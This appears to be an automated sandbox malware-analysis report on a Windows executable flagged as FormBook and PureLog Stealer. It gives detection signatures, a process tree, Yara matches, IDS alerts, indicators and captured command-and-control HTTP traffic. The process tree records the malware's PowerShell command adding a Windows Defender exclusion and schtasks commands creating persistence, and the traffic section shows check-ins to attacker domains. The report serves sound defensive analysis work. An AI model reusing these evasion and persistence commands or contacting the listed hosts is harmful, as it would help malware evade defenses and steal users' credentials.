Windows Analysis Report
Inquiry files v2.exe

Overview

General Information

Sample name: Inquiry files v2.exe
Analysis ID: 1475661
MD5: 9c2717586122db3e57ba56513f66e1b8
SHA1: 8cbb9fbc61ab2ccbdbed70828fcbae389f7b2e1f
SHA256: ad233cdcf6ceab12b375ccdbf782170cb5717a76f8ecd5d7e45f84800f8ad2cc
Tags: exe

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses runas.exe to run programs with elevated privileges
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Inquiry files v2.exe (PID: 7124 cmdline: "C:\Users\user\Desktop\Inquiry files v2.exe" MD5: 9C2717586122DB3E57BA56513F66E1B8)
    • powershell.exe (PID: 876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5196 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4196 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 1616 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • YIJBuAgnqfKMtZ.exe (PID: 5956 cmdline: "C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • runas.exe (PID: 4832 cmdline: "C:\Windows\SysWOW64\runas.exe" MD5: 13646BC81C39130487DA538B2DED5B28)
          • firefox.exe (PID: 1136 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • WOzeoJQi.exe (PID: 2404 cmdline: C:\Users\user\AppData\Roaming\WOzeoJQi.exe MD5: 9C2717586122DB3E57BA56513F66E1B8)
    • schtasks.exe (PID: 1216 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 6720 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
No configs have been found
Yara matches (memory dumps)
Source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp; Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
  Strings:
  • 0x37c54:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x20713:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000000.00000002.2227220590.0000000007630000.00000004.08000000.00040000.00000000.sdmp; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp; Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
  Strings:
  • 0x2b8d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1438f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Yara matches (unpacked PEs)
Source: 9.2.WOzeoJQi.exe.27bdc94.0.raw.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 7.2.RegSvcs.exe.400000.0.unpack; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 7.2.RegSvcs.exe.400000.0.unpack; Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
  Strings:
  • 0x2dd73:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16832:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 9.2.WOzeoJQi.exe.27bdc94.0.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 0.2.Inquiry files v2.exe.7630000.1.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security

                System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry files v2.exe", ParentImage: C:\Users\user\Desktop\Inquiry files v2.exe, ParentProcessId: 7124, ParentProcessName: Inquiry files v2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe", ProcessId: 876, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WOzeoJQi.exe, ParentImage: C:\Users\user\AppData\Roaming\WOzeoJQi.exe, ParentProcessId: 2404, ParentProcessName: WOzeoJQi.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp", ProcessId: 1216, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry files v2.exe", ParentImage: C:\Users\user\Desktop\Inquiry files v2.exe, ParentProcessId: 7124, ParentProcessName: Inquiry files v2.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp", ProcessId: 4196, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry files v2.exe", ParentImage: C:\Users\user\Desktop\Inquiry files v2.exe, ParentProcessId: 7124, ParentProcessName: Inquiry files v2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe", ProcessId: 876, ProcessName: powershell.exe

                Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry files v2.exe", ParentImage: C:\Users\user\Desktop\Inquiry files v2.exe, ParentProcessId: 7124, ParentProcessName: Inquiry files v2.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp", ProcessId: 4196, ProcessName: schtasks.exe

Snort IDS alerts

Timestamp                          SID      Src Port  Dst Port  Protocol  Classtype
07/18/24-07:58:39.821867           2855465  49735     80        TCP       A Network Trojan was detected
07/18/24-07:57:57.118083           2855465  49726     80        TCP       A Network Trojan was detected
07/18/24-07:58:26.022749           2855465  49731     80        TCP       A Network Trojan was detected
2024-07-18T07:58:49.249317+0200    2855464  49737     80        TCP       A Network Trojan was detected
2024-07-18T07:58:24.375289+0200    2855464  49730     80        TCP       A Network Trojan was detected
2024-07-18T07:58:35.096685+0200    2855464  49733     80        TCP       A Network Trojan was detected
2024-07-18T07:58:21.770675+0200    2855464  49729     80        TCP       A Network Trojan was detected
2024-07-18T07:58:26.978010+0200    2050745  49731     80        TCP       Malware Command and Control Activity Detected
2024-07-18T07:58:32.533421+0200    2855464  49732     80        TCP       A Network Trojan was detected
2024-07-18T07:58:40.282074+0200    2050745  49735     80        TCP       Malware Command and Control Activity Detected
2024-07-18T07:58:37.683924+0200    2855464  49734     80        TCP       A Network Trojan was detected
2024-07-18T07:57:57.804335+0200    2855465  49726     80        TCP       A Network Trojan was detected
2024-07-18T07:58:46.875735+0200    2855464  49736     80        TCP       A Network Trojan was detected
2024-07-18T07:58:26.978010+0200    2855465  49731     80        TCP       A Network Trojan was detected
2024-07-18T07:58:19.096164+0200    2855464  49727     80        TCP       A Network Trojan was detected
2024-07-18T07:58:40.282074+0200    2855465  49735     80        TCP       A Network Trojan was detected
2024-07-18T07:57:57.804335+0200    2050745  49726     80        TCP       Malware Command and Control Activity Detected
2024-07-18T07:58:51.685646+0200    2855464  49738     80        TCP       A Network Trojan was detected


                AV Detection

Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe, ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe, Virustotal: Detection: 47%
Source: Inquiry files v2.exe, ReversingLabs: Detection: 65%
Source: Inquiry files v2.exe, Virustotal: Detection: 47%
Source: Yara match, File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe, Joe Sandbox ML: detected
Source: Inquiry files v2.exe, Joe Sandbox ML: detected
Source: Inquiry files v2.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Inquiry files v2.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: runas.pdbGCTL source: RegSvcs.exe, 00000007.00000002.2569895467.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, YIJBuAgnqfKMtZ.exe, 0000000F.00000003.2507786781.000000000159B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3371819645.00000000003EE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: RegSvcs.pdb, source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3378759157.0000000003EEC000.00000004.80000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3375891934.00000000052FC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3372111139.0000000003078000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000013.00000002.3028784720.0000000012D9C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000007.00000002.2570230475.0000000001280000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2569861761.0000000004973000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2579072541.0000000004B29000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.2570230475.0000000001280000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2569861761.0000000004973000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2579072541.0000000004B29000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3378759157.0000000003EEC000.00000004.80000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3375891934.00000000052FC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3372111139.0000000003078000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000013.00000002.3028784720.0000000012D9C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: runas.pdb source: RegSvcs.exe, 00000007.00000002.2569895467.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, YIJBuAgnqfKMtZ.exe, 0000000F.00000003.2507786781.000000000159B000.00000004.00000020.00020000.00000000.sdmp

                Networking

Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49726 -> 185.179.189.181:80
Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49731 -> 172.96.191.69:80
Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49735 -> 13.248.169.48:80
Source: Joe Sandbox View, IP Address: 13.248.169.48
Source: Joe Sandbox View, IP Address: 162.159.134.42
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: Joe Sandbox View, ASN Name: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected:
    GET /midu/?hR1p0=vfrlb&zRU=9nR4RRbtczDLM92wROaICO8mWeENBuMayS9RmkCU7FdLWzi6Zh5WY9LbBJga/o2cXaf6PRrIolXtwoFpXTr9SyPSPVCys8awhBwFZAVidM2Yj+9OFlKtZImodfdv2xp/fybq7VQ= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en
    Host: www.scottifqqy.online
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic, HTTP traffic detected:
    GET /d3vb/?zRU=ADPQ8lRoxSByg+mG86XNue8ofAjmBVNA7RwbiYYLDlrQv278ITvGwT6pBJPFcJ5Oe9Xpz76I5qFPHvmWTw5Y21ldoEnhDfgwrYz6sOCTt4XHqos0nmhmqCv1SSwJ5dTjY+t3Vmc=&hR1p0=vfrlb HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en
    Host: www.ancuapengiu28.com
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic, HTTP traffic detected:
    GET /cf3x/?hR1p0=vfrlb&zRU=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en
    Host: www.techacademy.store
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic, DNS traffic detected: DNS query: www.scottifqqy.online
Source: global traffic, DNS traffic detected: DNS query: www.ancuapengiu28.com
Source: global traffic, DNS traffic detected: DNS query: www.techacademy.store
Source: global traffic, DNS traffic detected: DNS query: www.goodneighbor.club
Source: unknown, HTTP traffic detected:
    POST /d3vb/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en
    Accept-Encoding: gzip, deflate, br
    Host: www.ancuapengiu28.com
    Origin: http://www.ancuapengiu28.com
    Referer: http://www.ancuapengiu28.com/d3vb/
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Content-Length: 208
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
    Data Ascii: zRU=NBnw/TZ1lQBPsfa3rpaMtIA1Yn3jf3F3q2N6+oYIKRbas0HGWTbFyyfTLcDHUJtwHe60rcmpo9V3Ku66XT4l9UJJzj3lTu0WnYPxpMaMz57GhN8FvE8R1W7TXxUhgPLUQ89SDjbA4AB/pWw2GFC6RY/rt2UzzlMD315CVBXUj59PsElWw/U9oYoSN9S9XMVCfkLjU9uPZqwf
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 796
    date: Thu, 18 Jul 2024 05:58:18 GMT
    server: LiteSpeed
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 796
    date: Thu, 18 Jul 2024 05:58:21 GMT
    server: LiteSpeed
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 18 Jul 2024 05:58:24 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 18 Jul 2024 05:58:26 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 